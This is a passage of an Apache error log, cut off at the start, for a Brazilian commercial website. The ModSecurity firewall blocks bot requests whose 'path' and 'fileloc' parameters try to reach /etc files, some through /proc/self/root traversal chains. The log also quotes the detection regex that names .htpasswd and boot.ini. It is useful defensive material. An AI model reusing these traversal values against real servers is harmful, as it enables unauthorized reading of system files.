"ab1N7PXLqtnMIWvjpaK8QgAAAoU"]
[Fri Mar 20 10:38:52.554219 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.21:33614] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1N6-oXxyEfFpUF8f-hvgAAAVI"]
[Fri Mar 20 10:38:53.183347 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.53:33676] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1N7da6ubjKNq_cu4b6-AAAA0U"]
[Fri Mar 20 10:39:08.711098 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:54984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1N_OoXxyEfFpUF8f-h1QAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:39:13.094671 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.228.61:36174] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1OAeoXxyEfFpUF8f-h1gAAAVY"]
[Fri Mar 20 10:39:13.392744 2026] [mime_magic:error] [pid 11167:tid 140411632822016] (70014)End of file found: [client 57.141.18.71:34734] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:39:17.685001 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.102:34862] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OBV1pVZ5mVmJwsFNRLAAAAFc"]
[Fri Mar 20 10:39:22.269571 2026] [:error] [pid 9818:tid 140411557287680] [client 57.141.18.24:35242] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OCl1pVZ5mVmJwsFNRNQAAAFY"]
[Fri Mar 20 10:39:32.383006 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.33:35642] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OFPXLqtnMIWvjpaK8iwAAAo8"]
[Fri Mar 20 10:39:34.955428 2026] [:error] [pid 11642:tid 140411691570944] [client 57.141.18.65:35804] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OFrninkcc-iUj5Ap_EwAAA4Y"]
[Fri Mar 20 10:39:36.807747 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.243.128:40558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OGPXLqtnMIWvjpaK8kwAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:39:52.313781 2026] [mime_magic:error] [pid 21219:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:36436] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:39:55.079435 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.106:36884] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OK_XLqtnMIWvjpaK8qwAAApU"]
[Fri Mar 20 10:39:58.989456 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.87:37102] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1OLvXLqtnMIWvjpaK8swAAApA"]
[Fri Mar 20 10:40:01.453427 2026] [:error] [pid 9818:tid 140411540502272] [client 57.141.18.27:37152] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1OMV1pVZ5mVmJwsFNRWAAAAFg"]
[Fri Mar 20 10:40:01.464537 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.17:37150] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OMBCii7xarUs8iHaMEQAAAgw"]
[Fri Mar 20 10:40:01.689444 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.60:37178] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OMeoXxyEfFpUF8f-iEAAAAU0"]
[Fri Mar 20 10:40:19.683975 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.241.31:45020] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OQ7ninkcc-iUj5Ap_aAAAA5U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:40:22.617838 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:59942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ORvqxLDW4GITHUkQLXgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:40:26.502781 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.82:38184] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1OSta6ubjKNq_cu4b7XwAAA1I"]
[Fri Mar 20 10:40:29.250542 2026] [:error] [pid 9818:tid 140411725141760] [client 57.141.18.40:38248] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1OTF1pVZ5mVmJwsFNRaAAAAEI"]
[Fri Mar 20 10:40:32.968291 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.244.43:33706] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1OUPXLqtnMIWvjpaK83wAAApQ"]
[Fri Mar 20 10:40:42.170927 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.241.31:59950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OWhCii7xarUs8iHaMSQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:40:43.543005 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.241.31:37694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1OW_HIg5MgXLBnicMYCwAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:40:46.280639 2026] [:error] [pid 11642:tid 140411548894976] [client 57.141.18.52:38944] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1OXrninkcc-iUj5Ap_ggAAA5c"]
[Fri Mar 20 10:41:03.053634 2026] [:error] [pid 11642:tid 140411540502272] [client 57.141.18.21:39558] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Ob7ninkcc-iUj5Ap_igAAA5g"]
[Fri Mar 20 10:41:05.029045 2026] [:error] [pid 21219:tid 140411658000128] [client 57.141.18.52:39636] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1OcfXLqtnMIWvjpaK89QAAAoo"]
[Fri Mar 20 10:41:05.559135 2026] [:error] [pid 7893:tid 140411599251200] [client 57.141.18.59:39694] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1OcRCii7xarUs8iHaMZAAAAhE"]
[Fri Mar 20 10:41:06.283230 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.4:39728] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Octa6ubjKNq_cu4b7iQAAA0I"]
[Fri Mar 20 10:41:06.407916 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.67:39738] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Octa6ubjKNq_cu4b7igAAA1g"]
